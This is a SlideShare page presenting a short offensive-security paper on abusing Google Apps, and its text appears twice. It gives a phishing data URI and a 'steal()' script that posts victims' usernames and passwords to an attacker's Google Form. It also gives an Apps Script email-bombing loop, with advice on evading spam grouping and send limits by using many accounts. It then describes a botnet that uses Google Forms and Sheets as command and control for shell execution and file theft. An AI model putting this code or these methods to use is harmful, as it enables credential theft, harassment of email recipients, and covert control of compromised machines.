SlideShare a Scribd company logo
Abusing Google Apps: Google is my
Command and Control Center
Ajin Abraham
ajin25@gmail.com
www.opensecurity.in

INTRODUCTION
Google Apps is a cloud-based productivity suite used by a large section of people
including Corporate, Academic and Home users. This paper is about abusing innocent
Google Apps and Data API to implement offensive attacks. The major and widely used
Google Apps like Google Forms, Google Spreadsheet and Google Script as well as the
Google Apps API can be abused for implementing various attack vectors. This paper
will look into the following things:
1. Phishing with Data URI and Google Forms.
2. E-mail Bombing regenerated with Google App Script.
3. Implementing a Cross-Platform Botnet with its C&C hosted with Google.

ABUSING DATA URI AND GOOGLE FORMS
Data URI is a URI scheme that allows a web developer to include inline code into
webpages. These codes are executed as if they were from external sources. It was
discovered before and discussed in klevjers’s paper about Data URI that by abusing
Data URI and URL Shortners, hackers can implement a brand new phishing attack. The
data URI may looks like the following.

data:text/html,<title>Login</title><p align="center">Email:<input
type="text"><br>Password:<input type="text"><br><input type="submit"
value="Log in">

So this piece of code will get executed once you provide this in the URL field of a
browser.
One could easily use an URL Shortner service to shorten the data URI.
We are utilizing this previous knowledge to implement Hostless Phishing.
Hostless Phishing means the phisher is hosted nowhere as such. However one can say
that the source code is stored in the URL Shortner’s database. We will do some
workarounds to bypass the URL length restrictions enforced by the browsers. We use a
bit of AJAX and Google Forms to implement this. We will inject the following AJAX which
will capture all the keystrokes and send them to a Google Form and the data is logged
in the attached Spreadsheet.
<script>
function steal()
{
var us = document.fb.email.value;
var ps = document.fb.pass.value;
var http=new XMLHttpRequest();
var url = "<form_action>";
var params = "<text_field>=USERNAME: "+us+" PASS: "+ps;
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send(params);
sleep(1000);
}
function sleep(milliseconds) {
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > milliseconds){
break;
}
}
}
</script>
So the final PoC will be include a genuine page’s source code, injected with a
Keylogging AJAX and this source is base encoded and crafted as a DATA URI and
finally URL shortened.
EMAIL BOMBING WITH GOOGLE APPSCRIPT
A single line of code inside a loop is required to start an Email Bombing with Google
App Script. App Script is much alike or almost like native Java Script with addition
classes to support Google Apps. To send a mail with a Google App Script you can use a
single line of code.

MailApp.sendEmail(‘to’,’subject’,’message’);

So simply you can put it inside a loop to perform an Email bombing. But since the mail
contents are all the same, in most of the modern email apps, all the similar mails are
stored under one email entry inbox, followed by the number of new mails. It forms a
hierarchical structure rather than separate new email entry.

In order to bypass that, we will send a mail with varying content each time. The
following code can do the needful.

sub=1;
msg=2;
while(1)
{
MailApp.sendEmail(“someone@somewhere.com”,sub,msg);
sub++;
msg++;
}

So this simple script can cause an Email Bombing the targeted email address. To
prevent this Google has applied a limit to the no of emails that can be send from an
account. But still you can run the script from multiple accounts, making it more
effective. It is observed that 98% of the messages are entering the email inbox rather
than ending up as Spam since the email headers are genuine, not caught by the spam
filters and obviously because they not blacklisted by the filters.
ABUSING GOOGLE API TO CONVERT GOOGLE APPS AS THE COMMAND AND CONTROL
CENTER FOR A BOTNET.

Xenotix xBOT is a powerful cross platform (Linux, Windows, Mac) bot written in
Python that abuse certain Google Services to implement Command & Control
Center for the botnet. The Google Apps Data API, Google Forms and Google
Spreadsheet is abused to implement C2 for a bot network. The Google Forms can
act as the C2 for a bot network. All the entries to the Google Form are send to an
attached Spreadsheet. Here we can implement a bot that will listen to the
Google Data API URL and extract the commands and later send back the
response via the same Form. The Google Data API allows us to fetch the contents
of a published spreadsheet in a variety of formats. The spreadsheet feeds are
fetched in RSS format and will parsed. For implementing the bot we will parse
through the source, fetch the commands and do the corresponding operations.

Fig1: Sample of Spreadsheet Feeds with commands and responses.

The xBOT's communication is encrypted as it uses Google's own SSL connection
and is nowhere affected by any firewalls or the ISP's tricky network
configurations. The botnet's commands and responses are encrypted making it
harder to sniff the bot’s communications. This Bot will be a prototype bot with
the bare minimum features of a Typical Bot. The intention of the paper is to give
an idea about how Google API’s can be abused for Botnet Implementation.
xBOT will be capable of performing operations like shell command execution,
downloading and uploading files, screen capturing, port scanning etc.
References
https://developers.google.com/gdata/samples?hl=en
https://developers.google.com/apps-script/
http://klevjers.com/papers/phishing.pdf
Abusing Google Apps and Data API: Google is My Command and Control Center

More Related Content

Viewers also liked

Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Ajin Abraham
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at Runtime
Ajin Abraham
 
Exploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginnersExploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginners
Ajin Abraham
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Asteroides
AsteroidesAsteroides
Asteroides
Albert Grau Gatell
 
Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.
Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.
Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.
ArihantEducation
 
Toxic Blue-Green Algae Reminders
Toxic Blue-Green Algae RemindersToxic Blue-Green Algae Reminders
Toxic Blue-Green Algae Reminders
K 38
 
ေႀကးမံု 1-nov-13-km
ေႀကးမံု 1-nov-13-kmေႀကးမံု 1-nov-13-km
ေႀကးမံု 1-nov-13-kmsan aye
 
The State of Global Markets 2013
The State of Global Markets 2013The State of Global Markets 2013
The State of Global Markets 2013
Envision Technology Advisors
 
Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...
Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...
Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...
Goldmedia Group
 
Calendario tenis competiciones castilla la mancha 2013
Calendario tenis competiciones castilla la mancha 2013Calendario tenis competiciones castilla la mancha 2013
Calendario tenis competiciones castilla la mancha 2013
jgtenisok
 
Briviesca a través del tiempo. La judería de Briviesca
Briviesca a través del tiempo. La judería de BriviescaBriviesca a través del tiempo. La judería de Briviesca
Briviesca a través del tiempo. La judería de Briviesca
labureba
 
21 febrero sandino vive 2014
21 febrero sandino vive 201421 febrero sandino vive 2014
21 febrero sandino vive 2014
Mario Jose Montiel Aleman
 
Concept02
Concept02Concept02
Concept02
erik lint
 
Cloud desktop for byod
Cloud desktop for byodCloud desktop for byod
Cloud desktop for byod
Droidcon Berlin
 
Jones aleph acqorders
Jones aleph acqordersJones aleph acqorders
Jones aleph acqorders
ENUG
 

Viewers also liked (16)

Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at Runtime
 
Exploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginnersExploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginners
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Asteroides
AsteroidesAsteroides
Asteroides
 
Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.
Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.
Sainilk Awasiya Mahavidyalaya announces admissions open for BBA.
 
Toxic Blue-Green Algae Reminders
Toxic Blue-Green Algae RemindersToxic Blue-Green Algae Reminders
Toxic Blue-Green Algae Reminders
 
ေႀကးမံု 1-nov-13-km
ေႀကးမံု 1-nov-13-kmေႀကးမံု 1-nov-13-km
ေႀကးမံု 1-nov-13-km
 
The State of Global Markets 2013
The State of Global Markets 2013The State of Global Markets 2013
The State of Global Markets 2013
 
Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...
Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...
Goldmedia Trendmonitor 2011. Analysen und Prognosen für 2011 in den Bereichen...
 
Calendario tenis competiciones castilla la mancha 2013
Calendario tenis competiciones castilla la mancha 2013Calendario tenis competiciones castilla la mancha 2013
Calendario tenis competiciones castilla la mancha 2013
 
Briviesca a través del tiempo. La judería de Briviesca
Briviesca a través del tiempo. La judería de BriviescaBriviesca a través del tiempo. La judería de Briviesca
Briviesca a través del tiempo. La judería de Briviesca
 
21 febrero sandino vive 2014
21 febrero sandino vive 201421 febrero sandino vive 2014
21 febrero sandino vive 2014
 
Concept02
Concept02Concept02
Concept02
 
Cloud desktop for byod
Cloud desktop for byodCloud desktop for byod
Cloud desktop for byod
 
Jones aleph acqorders
Jones aleph acqordersJones aleph acqorders
Jones aleph acqorders
 

More from Ajin Abraham

AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
Ajin Abraham
 
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperInjecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime Whitepaper
Ajin Abraham
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
Ajin Abraham
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Ajin Abraham
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Ajin Abraham
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
 
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
Ajin Abraham
 
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Ajin Abraham
 
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Ajin Abraham
 
Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012 Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012
Ajin Abraham
 
Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+
Ajin Abraham
 
Phishing With Data URI
Phishing With Data URIPhishing With Data URI
Phishing With Data URI
Ajin Abraham
 
Buffer overflow for Beginners
Buffer overflow for BeginnersBuffer overflow for Beginners
Buffer overflow for Beginners
Ajin Abraham
 

More from Ajin Abraham (14)

AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
 
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperInjecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime Whitepaper
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
 
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
 
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
 
Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012 Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012
 
Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+
 
Phishing With Data URI
Phishing With Data URIPhishing With Data URI
Phishing With Data URI
 
Buffer overflow for Beginners
Buffer overflow for BeginnersBuffer overflow for Beginners
Buffer overflow for Beginners
 

Recently uploaded

FinalSD_MathematicsGrade7_Session2_Unida.pptx
FinalSD_MathematicsGrade7_Session2_Unida.pptxFinalSD_MathematicsGrade7_Session2_Unida.pptx
FinalSD_MathematicsGrade7_Session2_Unida.pptx
JennySularte1
 
Accounting for Restricted Grants When and How To Record Properly
Accounting for Restricted Grants  When and How To Record ProperlyAccounting for Restricted Grants  When and How To Record Properly
Accounting for Restricted Grants When and How To Record Properly
TechSoup
 
SWOT analysis in the project Keeping the Memory @live.pptx
SWOT analysis in the project Keeping the Memory @live.pptxSWOT analysis in the project Keeping the Memory @live.pptx
SWOT analysis in the project Keeping the Memory @live.pptx
zuzanka
 
Standardized tool for Intelligence test.
Standardized tool for Intelligence test.Standardized tool for Intelligence test.
Standardized tool for Intelligence test.
deepaannamalai16
 
220711130100 udita Chakraborty Aims and objectives of national policy on inf...
220711130100 udita Chakraborty  Aims and objectives of national policy on inf...220711130100 udita Chakraborty  Aims and objectives of national policy on inf...
220711130100 udita Chakraborty Aims and objectives of national policy on inf...
Kalna College
 
Educational Technology in the Health Sciences
Educational Technology in the Health SciencesEducational Technology in the Health Sciences
Educational Technology in the Health Sciences
Iris Thiele Isip-Tan
 
CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...
Nguyen Thanh Tu Collection
 
The basics of sentences session 7pptx.pptx
The basics of sentences session 7pptx.pptxThe basics of sentences session 7pptx.pptx
The basics of sentences session 7pptx.pptx
heathfieldcps1
 
CapTechTalks Webinar Slides June 2024 Donovan Wright.pptx
CapTechTalks Webinar Slides June 2024 Donovan Wright.pptxCapTechTalks Webinar Slides June 2024 Donovan Wright.pptx
CapTechTalks Webinar Slides June 2024 Donovan Wright.pptx
CapitolTechU
 
Contiguity Of Various Message Forms - Rupam Chandra.pptx
Contiguity Of Various Message Forms - Rupam Chandra.pptxContiguity Of Various Message Forms - Rupam Chandra.pptx
Contiguity Of Various Message Forms - Rupam Chandra.pptx
Kalna College
 
Information and Communication Technology in Education
Information and Communication Technology in EducationInformation and Communication Technology in Education
Information and Communication Technology in Education
MJDuyan
 
220711130097 Tulip Samanta Concept of Information and Communication Technology
220711130097 Tulip Samanta Concept of Information and Communication Technology220711130097 Tulip Samanta Concept of Information and Communication Technology
220711130097 Tulip Samanta Concept of Information and Communication Technology
Kalna College
 
Bonku-Babus-Friend by Sathyajith Ray (9)
Bonku-Babus-Friend by Sathyajith Ray  (9)Bonku-Babus-Friend by Sathyajith Ray  (9)
Bonku-Babus-Friend by Sathyajith Ray (9)
nitinpv4ai
 
220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx
Kalna College
 
Ch-4 Forest Society and colonialism 2.pdf
Ch-4 Forest Society and colonialism 2.pdfCh-4 Forest Society and colonialism 2.pdf
Ch-4 Forest Society and colonialism 2.pdf
lakshayrojroj
 
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.pptLevel 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
Henry Hollis
 
220711130083 SUBHASHREE RAKSHIT Internet resources for social science
220711130083 SUBHASHREE RAKSHIT  Internet resources for social science220711130083 SUBHASHREE RAKSHIT  Internet resources for social science
220711130083 SUBHASHREE RAKSHIT Internet resources for social science
Kalna College
 
A Free 200-Page eBook ~ Brain and Mind Exercise.pptx
A Free 200-Page eBook ~ Brain and Mind Exercise.pptxA Free 200-Page eBook ~ Brain and Mind Exercise.pptx
A Free 200-Page eBook ~ Brain and Mind Exercise.pptx
OH TEIK BIN
 
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
EduSkills OECD
 
Pharmaceutics Pharmaceuticals best of brub
Pharmaceutics Pharmaceuticals best of brubPharmaceutics Pharmaceuticals best of brub
Pharmaceutics Pharmaceuticals best of brub
danielkiash986
 

Recently uploaded (20)

FinalSD_MathematicsGrade7_Session2_Unida.pptx
FinalSD_MathematicsGrade7_Session2_Unida.pptxFinalSD_MathematicsGrade7_Session2_Unida.pptx
FinalSD_MathematicsGrade7_Session2_Unida.pptx
 
Accounting for Restricted Grants When and How To Record Properly
Accounting for Restricted Grants  When and How To Record ProperlyAccounting for Restricted Grants  When and How To Record Properly
Accounting for Restricted Grants When and How To Record Properly
 
SWOT analysis in the project Keeping the Memory @live.pptx
SWOT analysis in the project Keeping the Memory @live.pptxSWOT analysis in the project Keeping the Memory @live.pptx
SWOT analysis in the project Keeping the Memory @live.pptx
 
Standardized tool for Intelligence test.
Standardized tool for Intelligence test.Standardized tool for Intelligence test.
Standardized tool for Intelligence test.
 
220711130100 udita Chakraborty Aims and objectives of national policy on inf...
220711130100 udita Chakraborty  Aims and objectives of national policy on inf...220711130100 udita Chakraborty  Aims and objectives of national policy on inf...
220711130100 udita Chakraborty Aims and objectives of national policy on inf...
 
Educational Technology in the Health Sciences
Educational Technology in the Health SciencesEducational Technology in the Health Sciences
Educational Technology in the Health Sciences
 
CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN TẬP VÀ PHÁT TRIỂN CÂU HỎI TRONG ĐỀ MINH HỌA THI TỐT NGHIỆP THPT ...
 
The basics of sentences session 7pptx.pptx
The basics of sentences session 7pptx.pptxThe basics of sentences session 7pptx.pptx
The basics of sentences session 7pptx.pptx
 
CapTechTalks Webinar Slides June 2024 Donovan Wright.pptx
CapTechTalks Webinar Slides June 2024 Donovan Wright.pptxCapTechTalks Webinar Slides June 2024 Donovan Wright.pptx
CapTechTalks Webinar Slides June 2024 Donovan Wright.pptx
 
Contiguity Of Various Message Forms - Rupam Chandra.pptx
Contiguity Of Various Message Forms - Rupam Chandra.pptxContiguity Of Various Message Forms - Rupam Chandra.pptx
Contiguity Of Various Message Forms - Rupam Chandra.pptx
 
Information and Communication Technology in Education
Information and Communication Technology in EducationInformation and Communication Technology in Education
Information and Communication Technology in Education
 
220711130097 Tulip Samanta Concept of Information and Communication Technology
220711130097 Tulip Samanta Concept of Information and Communication Technology220711130097 Tulip Samanta Concept of Information and Communication Technology
220711130097 Tulip Samanta Concept of Information and Communication Technology
 
Bonku-Babus-Friend by Sathyajith Ray (9)
Bonku-Babus-Friend by Sathyajith Ray  (9)Bonku-Babus-Friend by Sathyajith Ray  (9)
Bonku-Babus-Friend by Sathyajith Ray (9)
 
220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx
 
Ch-4 Forest Society and colonialism 2.pdf
Ch-4 Forest Society and colonialism 2.pdfCh-4 Forest Society and colonialism 2.pdf
Ch-4 Forest Society and colonialism 2.pdf
 
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.pptLevel 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
 
220711130083 SUBHASHREE RAKSHIT Internet resources for social science
220711130083 SUBHASHREE RAKSHIT  Internet resources for social science220711130083 SUBHASHREE RAKSHIT  Internet resources for social science
220711130083 SUBHASHREE RAKSHIT Internet resources for social science
 
A Free 200-Page eBook ~ Brain and Mind Exercise.pptx
A Free 200-Page eBook ~ Brain and Mind Exercise.pptxA Free 200-Page eBook ~ Brain and Mind Exercise.pptx
A Free 200-Page eBook ~ Brain and Mind Exercise.pptx
 
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
 
Pharmaceutics Pharmaceuticals best of brub
Pharmaceutics Pharmaceuticals best of brubPharmaceutics Pharmaceuticals best of brub
Pharmaceutics Pharmaceuticals best of brub
 

Abusing Google Apps and Data API: Google is My Command and Control Center

  • 1. Abusing Google Apps: Google is my Command and Control Center Ajin Abraham ajin25@gmail.com www.opensecurity.in INTRODUCTION Google Apps is a cloud-based productivity suite used by a large section of people including Corporate, Academic and Home users. This paper is about abusing innocent Google Apps and Data API to implement offensive attacks. The major and widely used Google Apps like Google Forms, Google Spreadsheet and Google Script as well as the Google Apps API can be abused for implementing various attack vectors. This paper will look into the following things: 1. Phishing with Data URI and Google Forms. 2. E-mail Bombing regenerated with Google App Script. 3. Implementing a Cross-Platform Botnet with its C&C hosted with Google. ABUSING DATA URI AND GOOGLE FORMS Data URI is a URI scheme that allows a web developer to include inline code into webpages. These codes are executed as if they were from external sources. It was discovered before and discussed in klevjers’s paper about Data URI that by abusing Data URI and URL Shortners, hackers can implement a brand new phishing attack. The data URI may looks like the following. data:text/html,<title>Login</title><p align="center">Email:<input type="text"><br>Password:<input type="text"><br><input type="submit" value="Log in"> So this piece of code will get executed once you provide this in the URL field of a browser. One could easily use an URL Shortner service to shorten the data URI. We are utilizing this previous knowledge to implement Hostless Phishing. Hostless Phishing means the phisher is hosted nowhere as such. However one can say
  • 2. that the source code is stored in the URL Shortner’s database. We will do some workarounds to bypass the URL length restrictions enforced by the browsers. We use a bit of AJAX and Google Forms to implement this. We will inject the following AJAX which will capture all the keystrokes and send them to a Google Form and the data is logged in the attached Spreadsheet. <script> function steal() { var us = document.fb.email.value; var ps = document.fb.pass.value; var http=new XMLHttpRequest(); var url = "<form_action>"; var params = "<text_field>=USERNAME: "+us+" PASS: "+ps; http.open("POST", url, true); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.send(params); sleep(1000); } function sleep(milliseconds) { var start = new Date().getTime(); for (var i = 0; i < 1e7; i++) { if ((new Date().getTime() - start) > milliseconds){ break; } } } </script> So the final PoC will be include a genuine page’s source code, injected with a Keylogging AJAX and this source is base encoded and crafted as a DATA URI and finally URL shortened. EMAIL BOMBING WITH GOOGLE APPSCRIPT A single line of code inside a loop is required to start an Email Bombing with Google App Script. App Script is much alike or almost like native Java Script with addition classes to support Google Apps. To send a mail with a Google App Script you can use a single line of code. MailApp.sendEmail(‘to’,’subject’,’message’); So simply you can put it inside a loop to perform an Email bombing. But since the mail contents are all the same, in most of the modern email apps, all the similar mails are
  • 3. stored under one email entry inbox, followed by the number of new mails. It forms a hierarchical structure rather than separate new email entry. In order to bypass that, we will send a mail with varying content each time. The following code can do the needful. sub=1; msg=2; while(1) { MailApp.sendEmail(“someone@somewhere.com”,sub,msg); sub++; msg++; } So this simple script can cause an Email Bombing the targeted email address. To prevent this Google has applied a limit to the no of emails that can be send from an account. But still you can run the script from multiple accounts, making it more effective. It is observed that 98% of the messages are entering the email inbox rather than ending up as Spam since the email headers are genuine, not caught by the spam filters and obviously because they not blacklisted by the filters. ABUSING GOOGLE API TO CONVERT GOOGLE APPS AS THE COMMAND AND CONTROL CENTER FOR A BOTNET. Xenotix xBOT is a powerful cross platform (Linux, Windows, Mac) bot written in Python that abuse certain Google Services to implement Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheet is abused to implement C2 for a bot network. The Google Forms can act as the C2 for a bot network. All the entries to the Google Form are send to an attached Spreadsheet. Here we can implement a bot that will listen to the Google Data API URL and extract the commands and later send back the
  • 4. response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and will parsed. For implementing the bot we will parse through the source, fetch the commands and do the corresponding operations. Fig1: Sample of Spreadsheet Feeds with commands and responses. The xBOT's communication is encrypted as it uses Google's own SSL connection and is nowhere affected by any firewalls or the ISP's tricky network configurations. The botnet's commands and responses are encrypted making it harder to sniff the bot’s communications. This Bot will be a prototype bot with the bare minimum features of a Typical Bot. The intention of the paper is to give an idea about how Google API’s can be abused for Botnet Implementation. xBOT will be capable of performing operations like shell command execution, downloading and uploading files, screen capturing, port scanning etc. References https://developers.google.com/gdata/samples?hl=en https://developers.google.com/apps-script/ http://klevjers.com/papers/phishing.pdf